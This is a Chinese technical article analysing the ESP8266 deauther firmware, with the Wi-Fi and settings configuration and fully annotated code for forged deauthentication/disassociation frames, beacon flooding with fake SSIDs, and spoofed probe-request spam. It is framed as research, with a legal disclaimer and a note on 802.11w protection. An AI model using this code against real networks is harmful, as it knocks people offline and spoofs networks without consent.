这一系列的文章仅作技术研究,请遵守相关法律(中华人民共和国网络安全法),请勿使用相关技术来攻击他人!
1 软件配置方法
1.1wifi相关配置
这一部分的配置在wifi.h文件中，这里规定了web文件的位置，以及wifi的配置，比如登录用的IP地址，默认是192.168.4.1，默认的子网掩码是255.255.255.0。从代码看，web服务监听在80端口（`ESP8266WebServer server(80)`），即明文HTTP，因此任何能接入该AP的设备都能直接访问管理页面，管理流量在无线侧也没有额外加密。
// Server and other global objects shared by the web / captive-portal code.
ESP8266WebServer server(80);            // HTTP server on TCP port 80 (plain HTTP, no TLS visible here)
DNSServer dnsServer;                    // DNS responder; presumably backs the captive portal (see wifi_config_captivePortal)
IPAddress apIP(192, 168, 4, 1);         // address of the device's own access point (the web UI login address)
IPAddress netMsk(255, 255, 255, 0);     // subnet mask of the AP network
File fsUploadFile;                      // file handle used while a file is being uploaded to the filesystem — inferred from the name, confirm
// current WiFi mode and config
uint8_t wifiMode = WIFI_MODE_OFF;       // radio starts in the "off" mode; WIFI_MODE_OFF is defined elsewhere
bool wifi_config_hidden = false;        // whether the AP beacons hide the SSID
bool wifi_config_captivePortal = false; // whether the captive portal (DNS redirect to apIP) is enabled — presumably
String wifi_config_ssid;                // SSID of the AP; empty until loaded from settings
String wifi_config_password;            // AP password; kept in plain text in RAM
String wifi_config_path;                // filesystem path of the web files served by `server`
1.2核心配置
这一部分的配置在Setting.h中，比如版本号、攻击超时时间、wifi的channel、SSID、password、是否隐藏SSID、语言等。比如登录使用的SSID默认为pwned，密码默认为deauther，默认的语言为英语。需要特别注意：这组默认SSID/密码写在公开源码里，是公开已知的，任何附近知道这个项目的人都可以连入使用默认配置的设备并通过web界面操控它，因此实际使用前务必修改SSID和密码。本来想做一个汉化包进去方便中国爱好者使用，后来发现在V2.1中，已经加入了中文语言包。V2.1web页面支持的语言包括：cn中文、cs捷克语、de德语、en英语、es西班牙语、fi芬兰语、fr法语、it意大利语、ro罗马尼亚语、ru俄语、tlh克林贡语
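// Default values of the persisted settings (Settings.h). Only the fields shown in this
// excerpt are documented; units of the timing values are not visible here and are hedged.
bool changed = false;               // set when a value was modified and still has to be saved
String version = VERSION;           // firmware version string; VERSION is defined elsewhere
bool beaconChannel = false;
bool autosave = true;               // write settings back automatically (interval: autosaveTime)
bool beaconInterval = false;
bool cli = true;                    // serial command-line interface enabled
bool displayInterface = USE_DISPLAY; // USE_DISPLAY is a build-time macro defined elsewhere
bool webInterface = true;           // web UI enabled
bool webSpiffs = false;
bool randomTX = false;
bool ledEnabled = true;
bool serialEcho = true;
uint32_t attackTimeout = 600;       // attacks stop after this long (units not shown here; presumably seconds — confirm)
uint32_t autosaveTime = 10000;      // autosave interval (presumably milliseconds — confirm)
uint32_t displayTimeout = 600;      // display blanking timeout (units not shown here — confirm)
uint16_t deauthsPerTarget = 20;     // deauth frames sent per target in one round — inferred from the name
uint16_t chTime = 384;              // time spent per channel (units not shown here — confirm)
uint16_t minDeauths = 3;
uint8_t forcePackets = 1;           // forwarded to sendPacket() via settings.getForcePackets()
uint8_t channel = 9;                // default Wi-Fi channel
uint8_t deauthReason = 1;           // 802.11 reason code, 1 = "unspecified reason"
// Explicitly null-initialised: callers such as deauthDevice() guard on a null MAC pointer,
// and an indeterminate pointer would silently defeat that check.
uint8_t *macSt = nullptr;           // station MAC buffer
uint8_t *macAP = nullptr;           // access-point MAC buffer
uint8_t probesPerSSID = 1;
String ssid = "pwned";              // default AP SSID — public knowledge, change before use
String password = "deauther";       // default AP password — public knowledge, change before use
bool hidden = false;                // hide the AP SSID
bool captivePortal = true;          // enable the captive portal by default
String lang = "en";                 // web UI language code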
1.3 其他配置
其他的配置涉及到一些关键的数据结构，这里没有多做研究。
2 网络攻击核心代码解析
2.1 deauth攻击
(1)deauth攻击数据包deauthPacket[26]的结构。需要说明的是，这种伪造的deauth/disassoc帧不带任何认证信息，完全依赖接收方"相信"帧头里的地址；启用了802.11w管理帧保护（PMF）的AP和客户端会直接丢弃这类未受保护的管理帧，这也是防御此类攻击的主要手段。
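// Template of the 26-byte deauthentication / disassociation management frame.
// deauthDevice() overwrites the three address fields, the reason code and byte 0
// (deauth vs. disassociate) before handing it to sendPacket().
uint8_t deauthPacket[26] = {
    /*  0 -  1 */ 0xC0, 0x00,                         // Frame Control: type 0 (management), subtype 0xC = deauth (0xA0 = disassociate)
    /*  2 -  3 */ 0x00, 0x00,                         // Duration (filled in by the SDK)
    /*  4 -  9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Address 1: receiver (target station; broadcast by default)
    /* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // Address 2: transmitter (spoofed AP address)
    /* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // Address 3: BSSID (AP)
    /* 22 - 23 */ 0x00, 0x00,                         // Fragment & sequence number (filled in by the SDK)
    /* 24 - 25 */ 0x01, 0x00                          // Reason code, little-endian (1 = unspecified reason)
};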
(2)deauth攻击核心代码
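// Sends a deauthentication + disassociation frame pair from `apMac` to `stMac`, and —
// when `stMac` is a real (non-broadcast) station — the same pair in the reverse
// direction, so both ends of the association are told to drop it.
//
//   apMac  - 6-byte address of the access point (used as transmitter and BSSID)
//   stMac  - 6-byte address of the station; may be the broadcast address
//   reason - 802.11 reason code written into byte 24 of the frame
//   ch     - channel passed to sendPacket()
//
// Returns true if at least one of the frames was reported as sent by sendPacket().
// Side effects: rewrites the shared deauthPacket template, updates packetSize,
// deauth.packetCounter and (on success) deauth.time.
bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch) {
    // Both addresses are memcpy'd into the frame; the original only guarded stMac,
    // so a null apMac would have dereferenced NULL below.
    if (!apMac || !stMac) return false;
    // Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging
    bool success = false;

    // --- AP -> station ---
    packetSize = sizeof(deauthPacket);
    memcpy(&deauthPacket[4], stMac, 6);   // Address 1: receiver = station
    memcpy(&deauthPacket[10], apMac, 6);  // Address 2: transmitter = AP
    memcpy(&deauthPacket[16], apMac, 6);  // Address 3: BSSID = AP
    deauthPacket[24] = reason;            // low byte of the reason code; high byte stays 0

    deauthPacket[0] = 0xc0;               // subtype: deauthentication
    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
        success = true;
        deauth.packetCounter++;
    }
    deauthPacket[0] = 0xa0;               // subtype: disassociation
    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
        success = true;
        deauth.packetCounter++;
    }

    // --- station -> AP --- (skipped for a broadcast target: a broadcast address
    // cannot be a meaningful transmitter)
    if (!macBroadcast(stMac)) {
        memcpy(&deauthPacket[4], apMac, 6);   // receiver = AP
        memcpy(&deauthPacket[10], stMac, 6);  // transmitter = station
        memcpy(&deauthPacket[16], stMac, 6);  // BSSID field reused for the station, as in the original

        deauthPacket[0] = 0xc0;               // deauthentication
        if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
            success = true;
            deauth.packetCounter++;
        }
        deauthPacket[0] = 0xa0;               // disassociation
        if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
            success = true;
            deauth.packetCounter++;
        }
    }

    if (success) deauth.time = currentTime;
    return success;
}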
2.2 beacon攻击
(1)探测请求数据包probePacket[68]的结构（注：下面列出的其实是sendProbe()使用的probePacket[68]；sendBeacon()使用的beaconPacket[109]列在2.3节，原文这两处标题写反了）
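// Template of the 68-byte probe-request frame used by sendProbe().
// The SSID field is fixed at 32 bytes (tag length byte stays 0x20); sendProbe()
// copies the requested SSID over the leading bytes and patches the source address.
uint8_t probePacket[68] = {
    /*  0 -  1 */ 0x40, 0x00,                         // Frame Control: type 0 (management), subtype 4 = probe request
    /*  2 -  3 */ 0x00, 0x00,                         // Duration: 0 microseconds
    /*  4 -  9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Address 1: destination = broadcast
    /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, // Address 2: source (replaced with a spoofed MAC by sendProbe())
    /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Address 3: BSSID = broadcast
    /* 22 - 23 */ 0x00, 0x00,                         // Sequence number (filled in by the SDK)
    /* 24 - 25 */ 0x00, 0x20,                         // Tag 0 = SSID, tag length 32
    /* 26 - 57 */ 0x20, 0x20, 0x20, 0x20,             // SSID, initially 32 spaces
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
    /* 58 - 59 */ 0x01, 0x08,                         // Tag 1 = Supported Rates, tag length 8
    /* 60 */      0x82,                               // 1 Mbit/s (basic)
    /* 61 */      0x84,                               // 2 Mbit/s (basic)
    /* 62 */      0x8b,                               // 5.5 Mbit/s (basic)
    /* 63 */      0x96,                               // 11 Mbit/s (basic)
    /* 64 */      0x24,                               // 18 Mbit/s
    /* 65 */      0x30,                               // 24 Mbit/s
    /* 66 */      0x48,                               // 36 Mbit/s
    /* 67 */      0x6c                                // 54 Mbit/s
};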
(2)beacon攻击核心代码
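// Builds and sends one beacon frame advertising `ssid` from the spoofed address `mac`.
//
//   mac  - 6-byte address used as transmitter and BSSID
//   ssid - network name; truncated to 32 bytes (802.11 maximum)
//   ch   - channel written into the DS Parameter Set tag and passed to sendPacket()
//   wpa2 - true: keep the trailing RSN element and set the Privacy capability bit
//          (network looks encrypted); false: drop the RSN element, clear Privacy
//
// Returns true if sendPacket() reported success; then beacon.time / beacon.packetCounter
// are updated. The shared beaconPacket template is modified in place.
bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
    // strlen()/memcpy() on a null pointer would crash the device; refuse instead.
    if (!mac || !ssid) return false;

    packetSize = sizeof(beaconPacket);
    if (wpa2) {
        beaconPacket[34] = 0x31;  // capability info with the Privacy bit (0x10) set
    } else {
        beaconPacket[34] = 0x21;  // capability info without Privacy
        packetSize -= 26;         // drop the 26-byte RSN element at the end of the template
    }

    int ssidLen = strlen(ssid);
    if (ssidLen > 32) ssidLen = 32;
    memcpy(&beaconPacket[10], mac, 6);        // Address 2: transmitter
    memcpy(&beaconPacket[16], mac, 6);        // Address 3: BSSID
    memcpy(&beaconPacket[38], ssid, ssidLen); // SSID bytes (field is 32 bytes in the template)
    beaconPacket[82] = ch;                    // DS Parameter Set: current channel

    // The template reserves 32 bytes for the SSID; the frame that is actually sent is
    // compacted to the real SSID length. Its size never exceeds sizeof(beaconPacket), so a
    // fixed stack buffer is enough. The original used new[] and released it with plain
    // delete (undefined behaviour); a local array removes the allocation altogether, which
    // also avoids heap fragmentation on the ESP8266.
    uint8_t tmpPacket[sizeof(beaconPacket)];
    uint16_t tmpPacketSize = (packetSize - 32) + ssidLen;
    memcpy(&tmpPacket[0], &beaconPacket[0], 38 + ssidLen);                // header + tags up to and including the SSID bytes
    tmpPacket[37] = ssidLen;                                               // patch the SSID tag length
    memcpy(&tmpPacket[38 + ssidLen], &beaconPacket[70], wpa2 ? 39 : 13);  // rates + channel (+ RSN when wpa2)

    if (sendPacket(tmpPacket, tmpPacketSize, ch, settings.getForcePackets())) {
        beacon.time = currentTime;
        beacon.packetCounter++;
        return true;
    }
    return false;
}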
2.3 probe攻击
(1)beacon数据包beaconPacket[109]的结构（注：下面列出的其实是sendBeacon()使用的beaconPacket[109]；sendProbe()使用的probePacket[68]列在2.2节，原文这两处标题写反了）
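// Template of the 109-byte beacon frame used by sendBeacon(). The SSID field is
// reserved at 32 bytes here; sendBeacon() compacts it to the real length and drops
// the trailing RSN element (bytes 83-108) for open networks.
uint8_t beaconPacket[109] = {
    /*   0 -   3 */ 0x80, 0x00, 0x00, 0x00,                         // Frame Control: type 0 (management), subtype 8 = beacon; Duration 0
    /*   4 -   9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,             // Address 1: destination = broadcast
    /*  10 -  15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,             // Address 2: source / transmitter (replaced by sendBeacon())
    /*  16 -  21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,             // Address 3: BSSID (replaced by sendBeacon())
    // Fixed parameters
    /*  22 -  23 */ 0x00, 0x00,                                     // Fragment & sequence number (filled in by the SDK)
    /*  24 -  31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
    /*  32 -  33 */ 0xe8, 0x03,                                     // Beacon interval: 0x64,0x00 => every 100 ms; 0xe8,0x03 => every 1 s
    /*  34 -  35 */ 0x31, 0x00,                                     // Capability information (sendBeacon() sets 0x31 or 0x21)
    // Tagged parameters
    // SSID parameters
    /*  36 -  37 */ 0x00, 0x20,                                     // Tag 0 = SSID, tag length 32 (patched by sendBeacon())
    /*  38 -  69 */ 0x20, 0x20, 0x20, 0x20,                         // SSID, 32 spaces
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
                    0x20, 0x20, 0x20, 0x20,
    // Supported Rates
    /*  70 -  71 */ 0x01, 0x08,                                     // Tag 1 = Supported Rates, tag length 8
    /*  72 */       0x82,                                           // 1 Mbit/s (basic)
    /*  73 */       0x84,                                           // 2 Mbit/s (basic)
    /*  74 */       0x8b,                                           // 5.5 Mbit/s (basic)
    /*  75 */       0x96,                                           // 11 Mbit/s (basic)
    /*  76 */       0x24,                                           // 18 Mbit/s
    /*  77 */       0x30,                                           // 24 Mbit/s
    /*  78 */       0x48,                                           // 36 Mbit/s
    /*  79 */       0x6c,                                           // 54 Mbit/s
    // Current Channel
    /*  80 -  81 */ 0x03, 0x01,                                     // Tag 3 = DS Parameter Set, tag length 1
    /*  82 */       0x01,                                           // current channel (overwritten by sendBeacon())
    // RSN information (26 bytes; omitted for open networks)
    /*  83 -  84 */ 0x30, 0x18,                                     // Tag 48 = RSN, tag length 24
    /*  85 -  86 */ 0x01, 0x00,                                     // RSN version 1
    /*  87 -  90 */ 0x00, 0x0f, 0xac, 0x02,                         // group cipher suite: 00-0F-AC:2 (TKIP)
    /*  91 -  92 */ 0x02, 0x00,                                     // pairwise cipher suite count: 2
    /*  93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, // pairwise suites: CCMP, CCMP (changed from 0x02/TKIP: WPA2+TKIP is rejected by many devices)
    /* 101 - 102 */ 0x01, 0x00,                                     // AKM suite count: 1
    /* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,                         // AKM suite: 00-0F-AC:2 (PSK)
    /* 107 - 108 */ 0x00, 0x00                                      // RSN capabilities
};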
(2)probe攻击核心代码
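// Sends one probe-request frame for `ssid` from the spoofed source address `mac`.
//
//   mac  - 6-byte source address written into Address 2 of probePacket
//   ssid - network name; truncated to 32 bytes
//   ch   - channel passed to sendPacket()
//
// Returns true if sendPacket() reported success; then probe.time / probe.packetCounter
// are updated. The shared probePacket template is modified in place.
bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
    // strlen()/memcpy() on a null pointer would crash the device; refuse instead.
    if (!mac || !ssid) return false;

    packetSize = sizeof(probePacket);
    int ssidLen = strlen(ssid);
    if (ssidLen > 32) ssidLen = 32;
    memcpy(&probePacket[10], mac, 6);          // Address 2: spoofed source
    memcpy(&probePacket[26], ssid, ssidLen);   // SSID bytes
    // The SSID tag length byte (probePacket[25]) stays 32, so the whole 32-byte field goes
    // on the air. Pad the remainder with the template's original fill (0x20) so a short SSID
    // is not followed by leftover bytes from a previous, longer SSID.
    memset(&probePacket[26 + ssidLen], 0x20, 32 - ssidLen);

    if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
        probe.time = currentTime;
        probe.packetCounter++;
        return true;
    }
    return false;
}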